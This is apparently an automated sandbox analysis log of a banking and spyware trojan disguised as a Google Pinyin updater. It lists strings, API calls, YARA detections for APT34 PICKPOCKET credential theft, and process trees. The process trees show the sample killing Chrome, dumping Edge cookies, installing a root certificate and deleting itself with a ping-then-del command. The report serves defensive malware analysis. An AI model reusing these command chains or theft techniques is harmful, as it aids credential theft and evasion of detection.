Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecv37E8.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv37E8.tmp.9.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecv37E8.tmp.9.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecv37E8.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 6272167835D47591.exeString found in binary or memory: https://mail.google.com/mail
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail8
Source: ecv37E8.tmp.9.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: C:\Users\user\AppData\Roaming\1611970727133.exe, Code function: 9_2_0040AE4D OpenClipboard

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.6272167835D47591.exe.3350000.6.unpack, type: UNPACKEDPE, Matched rule: APT34_PICKPOCKET, Author: unknown
Source: 4.2.6272167835D47591.exe.32e0000.6.unpack, type: UNPACKEDPE, Matched rule: APT34_PICKPOCKET, Author: unknown
PE file has a writeable .text section
Source: N1yprTBBXs.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6272167835D47591.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611970727133.exe, Code function: 9_2_0040C516 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\1611970727133.exe, Code function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Code function: 2_2_1001DA70: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_004DC4D0 CloseHandle,_memset,CreateProcessAsUserW,GetLastError,CloseHandle,AssignProcessToJobObject,GetLastError,CloseHandle,SetThreadToken,ResumeThread,CloseHandle
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 2870F899F2E9EC540DA321F603CFB1A735DCD06DF016718E663DC78FEFDF5E0A
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: String function: 004854D0 appears 55 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: String function: 004EE38E appears 73 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: String function: 00407D80 appears 146 times
Source: N1yprTBBXs.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970727133.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe, 00000000.00000002.267691642.0000000002BD0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamenlsbres.dllj% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000000.00000002.268393285.0000000002BE0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000000.00000002.268416247.0000000002C30000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemswsock.dll.muij% vs N1yprTBBXs.exe
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: tsappcmp.dll
Source: N1yprTBBXs.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.2750000.2.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.2750000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.2880000.4.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.2730000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.2880000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.2730000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.3350000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.6272167835D47591.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/2
Source: C:\Users\user\AppData\Roaming\1611970727133.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,9_2_0040CE93
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_00469760 CoCreateInstance,0_2_00469760
Source: C:\Users\user\Desktop\N1yprTBBXs.exeCode function: 0_2_0043D110 FindResourceW,LoadResource,LockResource,SizeofResource,_memmove,VerQueryValueW,FreeLibrary,0_2_0043D110
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile created: C:\Users\user\AppData\Local\Login Data1611970726180
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Users\user\Desktop\N1yprTBBXs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\N1yprTBBXs.exeFile created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
Source: N1yprTBBXs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611970727133.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\N1yprTBBXs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\N1yprTBBXs.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: N1yprTBBXs.exeVirustotal: Detection: 38%
Source: N1yprTBBXs.exeMetadefender: Detection: 18%
Source: N1yprTBBXs.exeReversingLabs: Detection: 59%
Source: N1yprTBBXs.exeString found in binary or memory: GETpinyin<!-- IME Installed -->http://tools.google.com/pinyin/install.htmlhttp://tools.google.com/pinyin/uninstall.htmlsysdictpinyinversion:http://tools.google.com/service/updatesysdicthttps://tools.google.com/service/updateGooglePinyinUpdaterTrayIconpinyinpinyinsysdictGooglePinyinDict.exesysdictuserdictmodel
Source: C:\Users\user\Desktop\N1yprTBBXs.exeFile read: C:\Users\user\Desktop\N1yprTBBXs.exe
Source: unknownProcess created: C:\Users\user\Desktop\N1yprTBBXs.exe 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1611970727133.exe 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\N1yprTBBXs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\N1yprTBBXs.exeProcess created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Source: C:\Users\user\Desktop\N1yprTBBXs.exeProcess created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Source: C:\Users\user\Desktop\N1yprTBBXs.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeProcess created: C:\Users\user\AppData\Roaming\1611970727133.exe 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: N1yprTBBXs.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: N1yprTBBXs.exeStatic file information: File size 4999496 > 1048576
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: N1yprTBBXs.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x11fe00
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: N1yprTBBXs.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: N1yprTBBXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970727133.exe, 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp, 1611970727133.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
